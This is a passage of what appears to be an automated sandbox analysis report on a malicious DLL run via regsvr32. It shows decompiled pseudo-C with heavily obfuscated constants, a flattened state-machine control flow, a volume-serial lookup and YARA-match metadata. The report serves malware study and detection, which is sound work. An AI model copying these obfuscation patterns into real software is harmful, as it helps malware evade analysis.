                                                                                                                				_t140 = _v308 + 0xfffffff0;
                                                                                                                				_v12 = 3;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t236 = (_t234 | 0xffffffff) - 1;
                                                                                                                				if(_t236 <= 0) {
                                                                                                                					_t236 =  *( *_t140);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t236 + 4))))(_t140);
                                                                                                                				}
                                                                                                                				_t142 = _v296 + 0xfffffff0;
                                                                                                                				_v12 = 2;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t238 = (_t236 | 0xffffffff) - 1;
                                                                                                                				if(_t238 <= 0) {
                                                                                                                					_t238 =  *( *_t142);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t238 + 4))))(_t142);
                                                                                                                				}
                                                                                                                				_t144 = _v304 + 0xfffffff0;
                                                                                                                				_v12 = 1;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t240 = (_t238 | 0xffffffff) - 1;
                                                                                                                				if(_t240 <= 0) {
                                                                                                                					_t240 =  *( *_t144);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t240 + 4))))(_t144);
                                                                                                                				}
                                                                                                                				_t146 = _v292 + 0xfffffff0;
                                                                                                                				_v12 = 0;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t242 = (_t240 | 0xffffffff) - 1;
                                                                                                                				if((_t240 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t242 =  *((intOrPtr*)( *_t146));
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t146)) + 4))))(_t146);
                                                                                                                				}
                                                                                                                				 *[fs:0x0] = _v20;
                                                                                                                				_pop(_t247);
                                                                                                                				_pop(_t165);
                                                                                                                				return E1003B437(_t246, _t165, _v24 ^ _t254, _t242, _t247, _t248);
                                                                                                                			}

                                                                                                                0x100125f7
                                                                                                                0x100125fa
                                                                                                                0x100125ff
                                                                                                                0x10012607
                                                                                                                0x10012610
                                                                                                                0x10012613
                                                                                                                0x10012621
                                                                                                                0x10012628
                                                                                                                0x10012632
                                                                                                                0x10012632
                                                                                                                0x10012659
                                                                                                                0x1001265f
                                                                                                                0x10012666
                                                                                                                0x10012668
                                                                                                                0x1001266d
                                                                                                                0x10012674
                                                                                                                0x10012674
                                                                                                                0x10012685
                                                                                                                0x1001269d
                                                                                                                0x100126a4
                                                                                                                0x100126a9
                                                                                                                0x100126ac
                                                                                                                0x100126b3
                                                                                                                0x100126b5
                                                                                                                0x100126ba
                                                                                                                0x100126c1
                                                                                                                0x100126c1
                                                                                                                0x100126d2
                                                                                                                0x100126e0
                                                                                                                0x100126ed
                                                                                                                0x100126ee
                                                                                                                0x100126f0
                                                                                                                0x100126f8
                                                                                                                0x10012701
                                                                                                                0x10012704
                                                                                                                0x10012711
                                                                                                                0x10012718
                                                                                                                0x10012722
                                                                                                                0x10012722
                                                                                                                0x10012730
                                                                                                                0x1001273c
                                                                                                                0x1001273e
                                                                                                                0x10012746
                                                                                                                0x1001274f
                                                                                                                0x10012752
                                                                                                                0x10012759
                                                                                                                0x1001275f
                                                                                                                0x10012766
                                                                                                                0x1001276a
                                                                                                                0x10012770
                                                                                                                0x10012770
                                                                                                                0x10012776
                                                                                                                0x10012779
                                                                                                                0x10012787
                                                                                                                0x1001278b
                                                                                                                0x1001278e
                                                                                                                0x10012792
                                                                                                                0x10012798
                                                                                                                0x10012798
                                                                                                                0x1001279e
                                                                                                                0x100127a1
                                                                                                                0x100127af
                                                                                                                0x100127b3
                                                                                                                0x100127b6
                                                                                                                0x100127ba
                                                                                                                0x100127c0
                                                                                                                0x100127c0
                                                                                                                0x100127c6
                                                                                                                0x100127c9
                                                                                                                0x100127d7
                                                                                                                0x100127db
                                                                                                                0x100127de
                                                                                                                0x100127e2
                                                                                                                0x100127e8
                                                                                                                0x100127e8
                                                                                                                0x100127ee
                                                                                                                0x100127f1
                                                                                                                0x100127ff
                                                                                                                0x10012803
                                                                                                                0x10012806
                                                                                                                0x1001280a
                                                                                                                0x10012810
                                                                                                                0x10012810
                                                                                                                0x1001281b
                                                                                                                0x10012823
                                                                                                                0x10012824
                                                                                                                0x10012839

                                                                                                                APIs
                                                                                                                • GetVolumeInformationA.KERNEL32 ref: 10012659
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationVolume
                                                                                                                • String ID: %08X%08X$c:\
                                                                                                                • API String ID: 2039140958-3129558565
                                                                                                                • Opcode ID: 58f2a6bb30b0d3534e36166c84e75d48c19b438be0fc071ac721ba834e4b4b28
                                                                                                                • Instruction ID: 383ca456418867eed030b8b1388c456a826389f081089cec5dd2cd7039686146
                                                                                                                • Opcode Fuzzy Hash: 58f2a6bb30b0d3534e36166c84e75d48c19b438be0fc071ac721ba834e4b4b28
                                                                                                                • Instruction Fuzzy Hash: E5B17AB42086419FE355CB28C851B9BB7E5FFC9364F14861CF1A9CB2E1DB30A944CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001BEEC2(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				char _v256;
                                                                                                                				char _v264;
                                                                                                                				signed int _v268;
                                                                                                                				signed int _v272;
                                                                                                                				signed int _v276;
                                                                                                                				signed int _v280;
                                                                                                                				intOrPtr _v284;
                                                                                                                				signed int _v288;
                                                                                                                				signed int _v292;
                                                                                                                				signed int _v296;
                                                                                                                				signed int _v300;
                                                                                                                				signed int _v304;
                                                                                                                				signed int _v308;
                                                                                                                				signed int _v312;
                                                                                                                				signed int _v316;
                                                                                                                				signed int _v320;
                                                                                                                				signed int _v324;
                                                                                                                				signed int _v328;
                                                                                                                				signed int _v332;
                                                                                                                				signed int _v336;
                                                                                                                				signed int _v340;
                                                                                                                				signed int _v344;
                                                                                                                				signed int _v348;
                                                                                                                				signed int _v352;
                                                                                                                				signed int _v356;
                                                                                                                				signed int _v360;
                                                                                                                				signed int _v364;
                                                                                                                				signed int _v368;
                                                                                                                				signed int _v372;
                                                                                                                				signed int _v376;
                                                                                                                				signed int _v380;
                                                                                                                				signed int _v384;
                                                                                                                				signed int _v388;
                                                                                                                				signed int _v392;
                                                                                                                				signed int _v396;
                                                                                                                				signed int _v400;
                                                                                                                				signed int _v404;
                                                                                                                				void* _t319;
                                                                                                                				intOrPtr _t330;
                                                                                                                				intOrPtr _t331;
                                                                                                                				void* _t334;
                                                                                                                				intOrPtr _t335;
                                                                                                                				intOrPtr _t339;
                                                                                                                				intOrPtr _t344;
                                                                                                                				void* _t346;
                                                                                                                				intOrPtr _t348;
                                                                                                                				void* _t352;
                                                                                                                				intOrPtr _t353;
                                                                                                                				void* _t356;
                                                                                                                				intOrPtr _t362;
                                                                                                                				intOrPtr _t363;
                                                                                                                				intOrPtr _t395;
                                                                                                                				void* _t399;
                                                                                                                				signed int _t400;
                                                                                                                				signed int _t401;
                                                                                                                				signed int _t402;
                                                                                                                				signed int _t403;
                                                                                                                				signed int _t404;
                                                                                                                				intOrPtr _t405;
                                                                                                                				void* _t406;
                                                                                                                				void* _t407;
                                                                                                                				void* _t408;
                                                                                                                				void* _t411;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_t406 = __edx;
                                                                                                                				_push(_a16);
                                                                                                                				_v284 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(__ecx);
                                                                                                                				_v380 = 0x2d3ac2;
                                                                                                                				_t408 = _t407 + 0x1c;
                                                                                                                				_v380 = _v380 | 0x68f5ad44;
                                                                                                                				_v380 = _v380 ^ 0x1e544770;
                                                                                                                				_t353 = 0;
                                                                                                                				_t356 = 0x91c5fd4;
                                                                                                                				_t400 = 0x6f;
                                                                                                                				_v380 = _v380 / _t400;
                                                                                                                				_v380 = _v380 ^ 0x0119c283;
                                                                                                                				_v328 = 0x428f67;
                                                                                                                				_v328 = _v328 + 0xffff77f8;
                                                                                                                				_v328 = _v328 | 0x9f29f037;
                                                                                                                				_v328 = _v328 ^ 0x9f6932ec;
                                                                                                                				_v316 = 0xc93985;
                                                                                                                				_v316 = _v316 >> 5;
                                                                                                                				_v316 = _v316 ^ 0x0007a940;
                                                                                                                				_v344 = 0x20b305;
                                                                                                                				_v344 = _v344 | 0x663777d8;
                                                                                                                				_v344 = _v344 ^ 0x66365aac;
                                                                                                                				_v300 = 0x15378f;
                                                                                                                				_v300 = _v300 + 0xffff208d;
                                                                                                                				_v300 = _v300 ^ 0x00116b1c;
                                                                                                                				_v312 = 0xc9e24c;
                                                                                                                				_v312 = _v312 | 0x3fcfd123;
                                                                                                                				_v312 = _v312 ^ 0x3fc36414;
                                                                                                                				_v388 = 0x2d039f;
                                                                                                                				_v388 = _v388 << 2;
                                                                                                                				_v388 = _v388 + 0xffff7214;
                                                                                                                				_v388 = _v388 << 0xf;
                                                                                                                				_v388 = _v388 ^ 0xc0476441;
                                                                                                                				_v288 = 0x4c4bb5;
                                                                                                                				_t401 = 0x34;
                                                                                                                				_v288 = _v288 / _t401;
                                                                                                                				_v288 = _v288 ^ 0x0005c766;
                                                                                                                				_v396 = 0x7dfd35;
                                                                                                                				_v396 = _v396 + 0xffff0f93;
                                                                                                                				_v396 = _v396 + 0xffff26a3;
                                                                                                                				_v396 = _v396 << 5;
                                                                                                                				_v396 = _v396 ^ 0x0f8af879;
                                                                                                                				_v320 = 0xe5374e;
                                                                                                                				_v320 = _v320 + 0xaac;
                                                                                                                				_v320 = _v320 ^ 0x00e775ed;
                                                                                                                				_v336 = 0x6b6a8;
                                                                                                                				_v336 = _v336 ^ 0x8d2b844a;
                                                                                                                				_v336 = _v336 >> 0xc;
                                                                                                                				_v336 = _v336 ^ 0x000a7bd7;
                                                                                                                				_v292 = 0x7d6921;
                                                                                                                				_v292 = _v292 * 0x4b;
                                                                                                                				_v292 = _v292 ^ 0x24ba1552;
                                                                                                                				_v368 = 0x59061b;
                                                                                                                				_v368 = _v368 ^ 0x08ef6f96;
                                                                                                                				_v368 = _v368 << 0xb;
                                                                                                                				_v368 = _v368 ^ 0xb3496db7;
                                                                                                                				_v304 = 0x460ae5;
                                                                                                                				_v304 = _v304 << 3;
                                                                                                                				_v304 = _v304 ^ 0x023ec4ee;
                                                                                                                				_v364 = 0xc52a4b;
                                                                                                                				_v364 = _v364 + 0xffff24ad;
                                                                                                                				_v364 = _v364 + 0xffff3837;
                                                                                                                				_v364 = _v364 ^ 0x00c3c2de;
                                                                                                                				_v296 = 0x33dfb;
                                                                                                                				_v296 = _v296 >> 0x10;
                                                                                                                				_v296 = _v296 ^ 0x0001f9cf;
                                                                                                                				_v376 = 0x8fbeb1;
                                                                                                                				_v376 = _v376 ^ 0xdf5668a7;
                                                                                                                				_v376 = _v376 << 1;
                                                                                                                				_t402 = 0x17;
                                                                                                                				_v376 = _v376 / _t402;
                                                                                                                				_v376 = _v376 ^ 0x085066b4;
                                                                                                                				_v392 = 0x25a6b0;
                                                                                                                				_v392 = _v392 + 0xefc7;
                                                                                                                				_v392 = _v392 ^ 0xa9b709e2;
                                                                                                                				_t403 = 0x7d;
                                                                                                                				_v392 = _v392 / _t403;
                                                                                                                				_v392 = _v392 ^ 0x015a7847;
                                                                                                                				_v352 = 0xb1c65f;
                                                                                                                				_t404 = 0x30;
                                                                                                                				_v352 = _v352 / _t404;
                                                                                                                				_v352 = _v352 | 0xa24a7a91;
                                                                                                                				_v352 = _v352 ^ 0xa24f4045;
                                                                                                                				_v404 = 0x870864;
                                                                                                                				_v404 = _v404 ^ 0xc483cb7e;
                                                                                                                				_v404 = _v404 * 0x71;
                                                                                                                				_v404 = _v404 ^ 0x4828da17;
                                                                                                                				_v404 = _v404 ^ 0xce3b8e48;
                                                                                                                				_v360 = 0x523c3a;
                                                                                                                				_v360 = _v360 << 3;
                                                                                                                				_v360 = _v360 ^ 0xabe904b9;
                                                                                                                				_v360 = _v360 ^ 0xa9754472;
                                                                                                                				_v372 = 0xa159f;
                                                                                                                				_v372 = _v372 ^ 0xadd9838a;
                                                                                                                				_v372 = _v372 >> 0xc;
                                                                                                                				_v372 = _v372 + 0xffffff77;
                                                                                                                				_v372 = _v372 ^ 0x0002e382;
                                                                                                                				_v308 = 0xc08961;
                                                                                                                				_v308 = _v308 << 9;
                                                                                                                				_v308 = _v308 ^ 0x811019c4;
                                                                                                                				_v332 = 0xc0cd6c;
                                                                                                                				_v332 = _v332 ^ 0x9e3d6b9c;
                                                                                                                				_v332 = _v332 >> 0xd;
                                                                                                                				_v332 = _v332 ^ 0x000c8c07;
                                                                                                                				_v324 = 0x5c15b7;
                                                                                                                				_v324 = _v324 ^ 0x7f2e955f;
                                                                                                                				_v324 = _v324 ^ 0x7f730aa2;
                                                                                                                				_v340 = 0xf88b65;
                                                                                                                				_v340 = _v340 * 0x53;
                                                                                                                				_v340 = _v340 >> 0xf;
                                                                                                                				_v340 = _v340 ^ 0x0006865d;
                                                                                                                				_v356 = 0xc3f938;
                                                                                                                				_v356 = _v356 << 7;
                                                                                                                				_v356 = _v356 + 0xffffeeaf;
                                                                                                                				_v356 = _v356 ^ 0x61f5b0d9;
                                                                                                                				_v400 = 0x9adc7;
                                                                                                                				_v400 = _v400 >> 0xa;
                                                                                                                				_v400 = _v400 + 0x1ff5;
                                                                                                                				_v400 = _v400 + 0xffff9cae;
                                                                                                                				_v400 = _v400 ^ 0xfff01e1f;
                                                                                                                				_v348 = 0xdbbe1d;
                                                                                                                				_v348 = _v348 * 0x18;
                                                                                                                				_v348 = _v348 | 0x09a9567e;
                                                                                                                				_v348 = _v348 ^ 0x1dbbdff9;
                                                                                                                				_v384 = 0x583c15;
                                                                                                                				_v384 = _v384 ^ 0x42db3d3f;
                                                                                                                				_v384 = _v384 >> 4;
                                                                                                                				_v384 = _v384 >> 8;
                                                                                                                				_v384 = _v384 ^ 0x00042c30;
                                                                                                                				_t405 = _v284;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t319 = 0xc8e66e0;
                                                                                                                					do {
                                                                                                                						while(1) {
                                                                                                                							L2:
                                                                                                                							_t411 = _t356 - 0x67d44ef;
                                                                                                                							if(_t411 > 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t411 == 0) {
                                                                                                                								_t334 = E001B2B1F(_v404,  &_v264, _a8, _v360);
                                                                                                                								_t408 = _t408 + 0xc;
                                                                                                                								if(_t334 != 0) {
                                                                                                                									_t399 = 0x7c0872b;
                                                                                                                									_t353 = 1;
                                                                                                                								}
                                                                                                                								_t356 = 0x70afad8;
                                                                                                                								while(1) {
                                                                                                                									L1:
                                                                                                                									_t319 = 0xc8e66e0;
                                                                                                                									goto L2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							if(_t356 == 0x31c7c2e) {
                                                                                                                								_t335 =  *0x1c4218; // 0x0
                                                                                                                								_t339 =  *0x1c4218; // 0x0
                                                                                                                								_t344 =  *0x1c4218; // 0x0
                                                                                                                								_t346 = E001BBD63( *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x1c)))), _t405,  &_v264,  &_v272, _v304, _v364,  *((intOrPtr*)(_t339 + 0x1c)) + 0x10, _v296,  &_v256, _v376,  *( *((intOrPtr*)(_t335 + 0x1c)) + 0x38) & 0x0000ffff, _v392);
                                                                                                                								_t408 = _t408 + 0x28;
                                                                                                                								if(_t346 == 0) {
                                                                                                                									_t399 = 0xe833939;
                                                                                                                									_t356 = 0x5fa529e;
                                                                                                                								} else {
                                                                                                                									_t356 = 0x67d44ef;
                                                                                                                								}
                                                                                                                								while(1) {
                                                                                                                									L1:
                                                                                                                									_t319 = 0xc8e66e0;
                                                                                                                									goto L2;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							if(_t356 == 0x5535232) {
                                                                                                                								if(_v276 >= _v384) {
                                                                                                                									_t348 = E001B519C( &_v280,  &_v272);
                                                                                                                								} else {
                                                                                                                									_t348 = E001BE168( &_v280);
                                                                                                                								}
                                                                                                                								_t405 = _t348;
                                                                                                                								_t319 = 0xc8e66e0;
                                                                                                                								_t356 =  !=  ? 0xc8e66e0 : 0x5fa529e;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							if(_t356 == 0x5fa529e) {
                                                                                                                								E001B17D2(_v332, _v324, _v280);
                                                                                                                								E001B17D2(_v340, _v356, _t405);
                                                                                                                								E001B17D2(_v400, _v348, _v272);
                                                                                                                								_t356 = _t399;
                                                                                                                								L33:
                                                                                                                								_t319 = 0xc8e66e0;
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							if(_t356 != 0x61a9530) {
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_t352 = E001B1B29( &_v280, _v344, _v300, _v284, _v312, _t406);
                                                                                                                							_t408 = _t408 + 0x10;
                                                                                                                							if(_t352 == 0) {
                                                                                                                								L37:
                                                                                                                								return _t353;
                                                                                                                							}
                                                                                                                							_t356 = 0x5535232;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t319 = 0xc8e66e0;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t356 == 0x70afad8) {
                                                                                                                							E001B17D2(_v372, _v308, _v264);
                                                                                                                							_t356 = 0x5fa529e;
                                                                                                                							goto L33;
                                                                                                                						}
                                                                                                                						if(_t356 == 0x91c5fd4) {
                                                                                                                							_t405 = 0;
                                                                                                                							_t288 =  &_v328; // 0xe775ed
                                                                                                                							E001B25CD(_v380,  *_t288, 0x100, _v316,  &_v256);
                                                                                                                							_v272 = _v272 & 0;
                                                                                                                							_t408 = _t408 + 0xc;
                                                                                                                							_v268 = _v268 & 0;
                                                                                                                							_t356 = 0x61a9530;
                                                                                                                							_v280 = _v280 & 0;
                                                                                                                							_v276 = _v276 & 0;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t319 = 0xc8e66e0;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t356 == _t319) {
                                                                                                                							_push(0x40);
                                                                                                                							E001A8744(_v320, _v336, 0xb, _v292, E001B96D4(_t356, 1),  &_v256, _v368);
                                                                                                                							_t408 = _t408 + 0x20;
                                                                                                                							_t356 = 0x31c7c2e;
                                                                                                                							while(1) {
                                                                                                                								L1:
                                                                                                                								_t319 = 0xc8e66e0;
                                                                                                                								goto L2;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_t356 != 0xe833939) {
                                                                                                                							goto L34;
                                                                                                                						}
                                                                                                                						_t362 =  *0x1c4218; // 0x0
                                                                                                                						_t330 =  *((intOrPtr*)( *((intOrPtr*)(_t362 + 0x1c)) + 0x3c));
                                                                                                                						 *((intOrPtr*)(_t362 + 8)) =  *((intOrPtr*)(_t362 + 8)) + 1;
                                                                                                                						_t395 =  *((intOrPtr*)(_t362 + 8));
                                                                                                                						 *((intOrPtr*)(_t362 + 0x1c)) = _t330;
                                                                                                                						if(_t330 == 0) {
                                                                                                                							 *((intOrPtr*)(_t362 + 0x1c)) =  *((intOrPtr*)(_t362 + 0x20));
                                                                                                                						}
                                                                                                                						_t331 =  *0x1c4218; // 0x0
                                                                                                                						if(_t395 >=  *((intOrPtr*)(_t331 + 4))) {
                                                                                                                							_t363 =  *0x1c4218; // 0x0
                                                                                                                							 *(_t363 + 8) =  *(_t363 + 8) & 0x00000000;
                                                                                                                							goto L37;
                                                                                                                						} else {
                                                                                                                							_t356 = 0x91c5fd4;
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						L34:
                                                                                                                					} while (_t356 != 0x7c0872b);
                                                                                                                					goto L37;
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !i}$:<R$F$u
                                                                                                                • API String ID: 0-712849541
                                                                                                                • Opcode ID: f7f8295cd181312ebe0aa22459fcc0bc1271cb2ae76fd27e49d480f0fa6e6f76
                                                                                                                • Instruction ID: a978b0e81b368ad1772fc6b7864f2d001ac06ba2b821a818cb8339e4718626c0
                                                                                                                • Opcode Fuzzy Hash: f7f8295cd181312ebe0aa22459fcc0bc1271cb2ae76fd27e49d480f0fa6e6f76
                                                                                                                • Instruction Fuzzy Hash: 230256715083409FC768CF65C585A9BBBE1FBC4758F60891DF68A86260D7B1C94ACF83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A958A(void* __ecx) {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				char _v1560;
                                                                                                                				signed int _v1564;
                                                                                                                				signed int _v1568;
                                                                                                                				signed int _v1572;
                                                                                                                				signed int _v1576;
                                                                                                                				signed int _v1580;
                                                                                                                				signed int _v1584;
                                                                                                                				signed int _v1588;
                                                                                                                				signed int _v1592;
                                                                                                                				signed int _v1596;
                                                                                                                				signed int _v1600;
                                                                                                                				signed int _v1604;
                                                                                                                				signed int _v1608;
                                                                                                                				signed int _v1612;
                                                                                                                				signed int _v1616;
                                                                                                                				signed int _v1620;
                                                                                                                				signed int _v1624;
                                                                                                                				signed int _v1628;
                                                                                                                				signed int _v1632;
                                                                                                                				signed int _v1636;
                                                                                                                				signed int _v1640;
                                                                                                                				signed int _v1644;
                                                                                                                				signed int _v1648;
                                                                                                                				signed int _v1652;
                                                                                                                				signed int _v1656;
                                                                                                                				signed int _v1660;
                                                                                                                				signed int _v1664;
                                                                                                                				signed int _v1668;
                                                                                                                				signed int _v1672;
                                                                                                                				signed int _v1676;
                                                                                                                				signed int _v1680;
                                                                                                                				signed int _t304;
                                                                                                                				signed int _t316;
                                                                                                                				signed int _t317;
                                                                                                                				signed int _t318;
                                                                                                                				signed int _t319;
                                                                                                                				signed int _t320;
                                                                                                                				signed int _t321;
                                                                                                                				void* _t352;
                                                                                                                				void* _t353;
                                                                                                                				signed int* _t356;
                                                                                                                
                                                                                                                				_t356 =  &_v1680;
                                                                                                                				_v1664 = 0xc19a19;
                                                                                                                				_t352 = __ecx;
                                                                                                                				_t353 = 0x2b81e36;
                                                                                                                				_t316 = 0x67;
                                                                                                                				_v1664 = _v1664 / _t316;
                                                                                                                				_v1664 = _v1664 + 0xfffffd8d;
                                                                                                                				_v1664 = _v1664 + 0xffffa5ef;
                                                                                                                				_v1664 = _v1664 ^ 0x000dde3a;
                                                                                                                				_v1584 = 0x581344;
                                                                                                                				_t317 = 0x65;
                                                                                                                				_v1584 = _v1584 / _t317;
                                                                                                                				_v1584 = _v1584 ^ 0x00015c6f;
                                                                                                                				_v1600 = 0x2429e4;
                                                                                                                				_v1600 = _v1600 >> 0xd;
                                                                                                                				_t318 = 6;
                                                                                                                				_v1600 = _v1600 * 0x1f;
                                                                                                                				_v1600 = _v1600 ^ 0x000dce82;
                                                                                                                				_v1604 = 0x26fb34;
                                                                                                                				_v1604 = _v1604 << 3;
                                                                                                                				_v1604 = _v1604 + 0xa8a6;
                                                                                                                				_v1604 = _v1604 ^ 0x013e1a98;
                                                                                                                				_v1636 = 0xc6d141;
                                                                                                                				_v1636 = _v1636 << 5;
                                                                                                                				_v1636 = _v1636 << 7;
                                                                                                                				_v1636 = _v1636 ^ 0x6d11db18;
                                                                                                                				_v1612 = 0x89f344;
                                                                                                                				_v1612 = _v1612 + 0xd981;
                                                                                                                				_v1612 = _v1612 >> 0xb;
                                                                                                                				_v1612 = _v1612 ^ 0x000f922d;
                                                                                                                				_v1628 = 0xb0a288;
                                                                                                                				_v1628 = _v1628 ^ 0xdebaad5a;
                                                                                                                				_v1628 = _v1628 ^ 0x1a6d48cf;
                                                                                                                				_v1628 = _v1628 ^ 0xc46f8b65;
                                                                                                                				_v1656 = 0xd951ba;
                                                                                                                				_v1656 = _v1656 ^ 0xf1cac2bf;
                                                                                                                				_v1656 = _v1656 << 8;
                                                                                                                				_v1656 = _v1656 + 0xffffc08d;
                                                                                                                				_v1656 = _v1656 ^ 0x13998d43;
                                                                                                                				_v1568 = 0xf34eef;
                                                                                                                				_v1568 = _v1568 ^ 0x3a7ae3f6;
                                                                                                                				_v1568 = _v1568 ^ 0x3a8bc50b;
                                                                                                                				_v1672 = 0x4d37d5;
                                                                                                                				_v1672 = _v1672 << 5;
                                                                                                                				_v1672 = _v1672 | 0x933c96e5;
                                                                                                                				_v1672 = _v1672 >> 5;
                                                                                                                				_v1672 = _v1672 ^ 0x04d852ba;
                                                                                                                				_v1680 = 0x840e45;
                                                                                                                				_v1680 = _v1680 * 0x5d;
                                                                                                                				_v1680 = _v1680 * 0x1d;
                                                                                                                				_v1680 = _v1680 * 0x4b;
                                                                                                                				_v1680 = _v1680 ^ 0x9614cb06;
                                                                                                                				_v1620 = 0x84e7d6;
                                                                                                                				_v1620 = _v1620 + 0xf311;
                                                                                                                				_v1620 = _v1620 / _t318;
                                                                                                                				_v1620 = _v1620 ^ 0x0017ceb8;
                                                                                                                				_v1596 = 0x7b1170;
                                                                                                                				_v1596 = _v1596 + 0xffff940a;
                                                                                                                				_v1596 = _v1596 >> 3;
                                                                                                                				_v1596 = _v1596 ^ 0x000738d6;
                                                                                                                				_v1572 = 0x7f7aa2;
                                                                                                                				_v1572 = _v1572 ^ 0x6b515ecb;
                                                                                                                				_v1572 = _v1572 ^ 0x6b26d5d7;
                                                                                                                				_v1648 = 0xea0ee0;
                                                                                                                				_v1648 = _v1648 ^ 0x2a4fb26a;
                                                                                                                				_t319 = 0x18;
                                                                                                                				_v1648 = _v1648 * 0x59;
                                                                                                                				_v1648 = _v1648 ^ 0xd39ea8a8;
                                                                                                                				_v1588 = 0x7294e;
                                                                                                                				_v1588 = _v1588 / _t319;
                                                                                                                				_v1588 = _v1588 + 0xd220;
                                                                                                                				_v1588 = _v1588 ^ 0x000937d8;
                                                                                                                				_v1580 = 0xe4f020;
                                                                                                                				_v1580 = _v1580 ^ 0x75ac60b8;
                                                                                                                				_v1580 = _v1580 ^ 0x75426166;
                                                                                                                				_v1564 = 0x41b2c8;
                                                                                                                				_v1564 = _v1564 + 0x5b41;
                                                                                                                				_v1564 = _v1564 ^ 0x0041c0c2;
                                                                                                                				_v1668 = 0x57251b;
                                                                                                                				_v1668 = _v1668 ^ 0x547b387c;
                                                                                                                				_v1668 = _v1668 ^ 0xa76c8ea1;
                                                                                                                				_v1668 = _v1668 + 0xffff6d22;
                                                                                                                				_v1668 = _v1668 ^ 0xf3424433;
                                                                                                                				_v1576 = 0x8bc1cd;
                                                                                                                				_v1576 = _v1576 ^ 0x6ed5b691;
                                                                                                                				_v1576 = _v1576 ^ 0x6e54d64e;
                                                                                                                				_v1676 = 0xc7b0c;
                                                                                                                				_v1676 = _v1676 >> 4;
                                                                                                                				_v1676 = _v1676 ^ 0x5a1cca20;
                                                                                                                				_t320 = 0x6b;
                                                                                                                				_v1676 = _v1676 * 0x55;
                                                                                                                				_v1676 = _v1676 ^ 0xeb5f0246;
                                                                                                                				_v1608 = 0x16f58a;
                                                                                                                				_v1608 = _v1608 + 0xffff29c6;
                                                                                                                				_v1608 = _v1608 | 0xc402f238;
                                                                                                                				_v1608 = _v1608 ^ 0xc41784a0;
                                                                                                                				_v1616 = 0x942680;
                                                                                                                				_v1616 = _v1616 | 0x011dd7c3;
                                                                                                                				_v1616 = _v1616 + 0xa2ce;
                                                                                                                				_v1616 = _v1616 ^ 0x0195346b;
                                                                                                                				_v1652 = 0x560519;
                                                                                                                				_v1652 = _v1652 ^ 0x239149e6;
                                                                                                                				_v1652 = _v1652 >> 6;
                                                                                                                				_v1652 = _v1652 * 0x2a;
                                                                                                                				_v1652 = _v1652 ^ 0x177dcd28;
                                                                                                                				_v1660 = 0x2d1ebe;
                                                                                                                				_v1660 = _v1660 * 0x7f;
                                                                                                                				_v1660 = _v1660 ^ 0xdb88960f;
                                                                                                                				_v1660 = _v1660 + 0xffffabb1;
                                                                                                                				_v1660 = _v1660 ^ 0xcde17186;
                                                                                                                				_v1592 = 0xb043a7;
                                                                                                                				_v1592 = _v1592 / _t320;
                                                                                                                				_t321 = 0x66;
                                                                                                                				_v1592 = _v1592 / _t321;
                                                                                                                				_v1592 = _v1592 ^ 0x000638f6;
                                                                                                                				_v1624 = 0xc7c902;
                                                                                                                				_t322 = 0x53;
